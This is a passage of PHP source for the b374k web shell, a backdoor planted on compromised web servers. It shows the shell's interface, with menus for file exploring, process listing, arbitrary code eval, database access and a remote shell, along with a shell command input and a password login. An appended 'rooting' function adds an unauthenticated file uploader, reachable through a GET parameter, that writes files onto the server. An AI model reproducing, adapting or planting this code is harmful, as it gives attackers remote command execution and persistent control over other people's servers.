    ?><a href='?x=pass'>password</a> | 
    <?php }
    ?><a href='<?php echo $s_self; ?>x=logout' title='Click me to log out'>log out</a>  <a href='<?php echo $s_self; ?>x=switch' title='Click me to change theme'><span class='schemabox'>&nbsp;&nbsp;</span></a></span><table id='header'><tr><td style='width:80px;'><table><tr><td><h1><a href='<?php echo $s_self."cd=".cp(dirname(realpath($_SERVER['SCRIPT_FILENAME']))); ?>'>b374k</a></h1></td></tr><tr><td style='text-align:right;'><div class='ver'><?php echo $s_ver; ?></div></td></tr></table></td>   <td><div class='headinfo'><?php echo $s_info; ?></div></td></tr></table></div>
    <div style='clear:both;'></div>
    <form method='post' name='g'></form>
    <div id='menu'>
        <table style='width:100%;'><tr>
        <td><a href='<?php echo $s_self; ?>' title='Explorer'><div class='menumi'>xpl</div></a></td>
        <td><a href='<?php echo $s_self; ?>x=ps' title='Display process status'><div class='menumi'>ps</div></a></td>
        <td><a href='<?php echo $s_self; ?>x=eval' title='Execute code'><div class='menumi'>eval</div></a></td>
        <td><a href='<?php echo $s_self; ?>x=info' title='Information about server'><div class='menumi'>info</div></a></td>
        <td><a href='<?php echo $s_self; ?>x=db' title='Connect to database'><div class='menumi'>db</div></a></td>
        <td><a href='<?php echo $s_self; ?>x=rs' title='Remote Shell'><div class='menumi'>rs</div></a></td>
        <td style='width:100%;padding:0 0 0 6px;'>
        <span class='prompt'><?php echo $s_prompt; ?></span><form action='<?php echo $s_self; ?>' method='post'>
        <input id='cmd' onclick="clickcmd();" class='inputz' type='text' name='cmd' style='width:70%;' value='<?php
if(isset($_GP['cmd'])) echo "";
else echo "- shell command -";
?>' />
        <noscript><input class='inputzbut' type='submit' value='Go !' name='submitcmd' style='width:80px;' /></noscript>
        </form>
        </td>
        </tr></table>
    </div>
    <div id='content'>
        <div id='result'><?php echo "__RESULT__"; ?></div>
    </div>
    <div id='navigation'>
    <div id='totop' onclick='totopd();' onmouseover='totop();' onmouseout='stopscroll();'></div>
    <div id='tobottom' onclick='tobottomd();' onmouseover='tobottom();' onmouseout='stopscroll();'></div>
    </div>
<?php } else{ ?>
    <div style='width:100%;text-align:center;'>
    <form action='<?php echo $s_self; ?>' method='post'>
    <img src='<?php echo $s_favicon; ?>' style='margin:2px;vertical-align:middle;' />
    b374k&nbsp;<span class='gaya'><?php echo $s_ver; ?></span><input id='login' class='inputz' type='password' name='login' style='width:120px;' value='' />
    <input class='inputzbut' type='submit' value='Go !' name='submitlogin' style='width:80px;' />
    </form>
    </div>
<?php }?>   </td></tr></table>
<p class='footer'>Jayalah Indonesiaku &copy;<?php echo @date("Y",time())." "; ?>b374k</p>
<?php echo $main_scs;?>
<script type='text/javascript'>
var d = document;
var scroll = false;
var cwd = '<?php echo hss(adds($s_cwd)); ?>';
var hexstatus = false;
var timer = '';
var x = '<?php if(isset($_GP['x']) && ($_GP['x']=='ps')) echo "ps"; ?>';
var sself = '<?php echo adds($s_self); ?>';
var hexcounter = 0;
var hextimer = '';
var counter = 0;

</script>
<?php echo get_code("js", $s_js); ?>
<script type='text/javascript'>
domready(function(){
    <?php if(isset($_GP['cmd'])) echo "if(d.getElementById('cmd')) d.getElementById('cmd').focus();"; ?>
    <?php if(isset($_GP['evalcode'])) echo "if(d.getElementById('evalcode')) d.getElementById('evalcode').focus();"; ?>
    <?php if(isset($_GP['sqlcode'])) echo "if(d.getElementById('sqlcode')) d.getElementById('sqlcode').focus();"; ?>
    <?php if(isset($_GP['login'])) echo "if(d.getElementById('login')) d.getElementById('login').focus();"; ?>
    <?php if(isset($_GP['hexedit'])) echo "showhex();"; ?>

    if(d.getElementById('cmd')) d.getElementById('cmd').setAttribute('autocomplete', 'off');

    var textareas = d.getElementsByTagName('textarea');
    var count = textareas.length;
    for(i = 0; i<count; i++){
        textareas[i].onkeydown = function(e){
            if(e.keyCode==9){
                e.preventDefault();
                var s = this.selectionStart;
                this.value = this.value.substring(0,this.selectionStart) + "\t" + this.value.substring(this.selectionEnd);
                this.selectionEnd = s+1;
            }
            else if(e.ctrlKey && (e.keyCode == 10 || e.keyCode == 13)){
                this.form.submit();
            }
        }
    }
    listen();
});
</script>
</body>
</html><?php
$s_html = ob_get_contents();
ob_end_clean();
$whitespace = "/(\s{2,}|\n{1,})/";
$s_html = preg_replace($whitespace, " ", $s_html);
$s_html = str_replace("__RESULT__", $s_result, $s_html);
echo $s_html;
die();
?>
<?php
function rooting()
{
echo '<b>Sw Bilgi<br><br>'.php_uname().'<br></b>';
echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
if( $_POST['_upl'] == "Upload" ) {
    if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Yuklendi</b><br><br>'; }
    else { echo '<b>Basarisiz</b><br><br>'; }
}
}
$x = $_GET["x"];
Switch($x){
case "rooting";
    rooting();
    break;
    
    }
?>